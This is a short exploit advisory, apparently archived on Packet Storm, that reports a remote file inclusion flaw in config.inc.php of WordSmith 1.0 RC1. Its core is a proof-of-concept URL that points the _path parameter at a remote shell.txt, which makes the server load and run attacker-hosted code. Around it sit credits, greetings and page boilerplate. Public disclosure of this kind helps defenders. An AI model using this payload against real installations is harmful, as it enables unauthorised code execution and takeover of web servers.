WordSmith version 1.0 RC1 suffers from a remote file inclusion vulnerability in config.inc.php.
0b29b8d86e0901fc1cfcfa37acbb400b7336821b6028d29f532a6285bb85d174--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+ WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion +==--
--==+================================================================================+==--
Software: WordSmith 1.0 RC1
SF page: http://sourceforge.net/news/?group_id=90418
exploit: Remote File Inclusion [High Risk]
By: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: http://skrypty.webpc.pl/pobierz13.html
##############################
==============
Dork: built in ;)
PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################
by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed